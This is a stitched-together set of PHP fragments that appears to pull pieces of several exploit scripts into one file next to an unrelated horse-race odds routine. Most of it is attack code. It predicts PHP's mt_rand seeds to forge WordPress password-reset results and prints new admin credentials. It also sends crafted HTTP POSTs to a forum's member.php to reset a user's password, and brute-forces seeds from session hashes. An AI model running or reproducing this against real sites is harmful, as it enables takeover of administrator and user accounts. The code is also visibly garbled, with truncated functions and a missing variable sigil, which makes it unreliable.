function horses_generate($seed)
{
global $horses_wins, $cnt, $horses_count, $races_count, $horses_coefficients, $horses_names;
if (!$seed) {
$seed = getseed(time() + 30 * 60 * $cnt);
}
//print $seed."<br>";
//srand($seed);
srand();
$s = $races_count;
//print "--".$horses_count;exit;
$res1 = runsql("select Name from ut_gladiator_names where CountryID='1' order by rand({$seed}) limit 0,{$horses_count}");
for ($i = 1; $i <= $horses_count; $i++) {
if ($i == $horses_count) {
$horses_wins[$i] = $s;
} elseif ($i == 1) {
$horses_wins[$i] = round(rand(1, $s + i - $horses_count) / 2);
} else {
$horses_wins[$i] = rand(1, $s + i - $horses_count);
}
//print "- $horses_wins[$i]<br>";
if ($horses_wins[$i] == 0) {
$horses_wins[$i] = 1;
}
$s = $s - $horses_wins[$i];
$horses_coefficients[$i] = round($races_count / $horses_wins[$i] * (0.9 + rand(-0.1, 0.1)), 1);
$r1 = mysql_fetch_array($res1);
$horses_names[$i] = $r1[0];
}
}
function calcpass($resetkey, $seed = false)
{
mt_srand(2);
$a = mt_rand();
mt_srand(3);
$b = mt_rand();
define('BUGGY', $a == $b);
echo "[-] wpress password computation. runnig in " . (BUGGY ? 'fast' : 'slow') . " mode\n";
echo "[+] got key {$resetkey} via mail\n";
if (!$seed) {
$seed = getseed($resetkey);
}
if ($seed === false) {
die("[!] seed not found :( try using identical php version (< 5.2.5)\n");
}
mt_srand($seed);
echo "[-] seed for key " . wp_generate_password(20, false) . " is {$seed}\n";
$pass = wp_generate_password();
echo "[+] new credentials are admin:{$pass}\n";
return $pass;
}
$data .= "Referer: http://{$host}{$path}\r\n";
$data .= "Host: {$host}\r\n";
$data .= "Content-Length: " . strlen($cmd) . "\r\n";
$data .= "Connection: close\r\n\r\n";
$data .= $cmd;
fputs($fp, $data);
$resp = '';
while ($fp && !feof($fp)) {
$resp .= fread($fp, 1024);
}
fclose($fp);
preg_match('/Set-Cookie:\\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid);
if (!$sid) {
exit("Exploit Failed!\n");
}
$seed = getseed();
if ($seed) {
mt_srand($seed);
random();
mt_rand();
$id = random();
$fp = fsockopen($host, 80);
$cmd = 'action=getpasswd&uid=' . $uid . '&id=' . $id . '&newpasswd1=123456&newpasswd2=123456&getpwsubmit=true&formhash=' . $hash[1];
$data = "POST " . $path . "member.php HTTP/1.1\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Referer: http://{$host}{$path}\r\n";
$data .= "Host: {$host}\r\n";
$data .= "Content-Length: " . strlen($cmd) . "\r\n";
$data .= "Connection: close\r\n\r\n";
$data .= $cmd;
fputs($fp, $data);
$packet = "GET {$path}index.php?action=reminder HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sess};\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n\r\n";
fputs($ock, $packet);
while (!feof($ock)) {
$resp = fgets($ock);
preg_match('@name="sc" value="([0-9a-f]+)"@i', $resp, $out);
if (isset($out[1])) {
$md5 = $out[1];
break;
}
}
if ($md5) {
$seed = getseed($md5);
if ($seed) {
echo "[+] Seed for next random number is {$seed}\n";
} else {
die("[-] Can't calculate seed\n");
}
} else {
die("[-] Random number hash not found\n");
}
function getseed($md5)
{
global $sess;
for ($i = 0; $i <= 32767; $i++) {
if ($md5 == md5($sess . $i)) {
return $i;
}
